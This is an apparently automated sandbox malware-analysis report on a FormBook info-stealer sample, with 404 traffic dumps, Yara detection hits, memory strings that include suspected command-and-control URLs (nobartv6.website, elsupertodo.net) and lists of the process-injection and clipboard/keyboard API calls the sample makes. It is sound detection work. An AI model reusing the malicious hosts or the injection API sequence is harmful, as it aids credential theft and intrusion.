            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: URUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website
            Source: URUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nobartv6.website/pp43/
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.3982015331.000000000313C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000003.2648034206.0000000007F7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000005.00000002.3982015331.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.3982015331.000000000313C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005408000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004478000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F9D8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukW
            Source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C063 NtClose,2_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03A72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
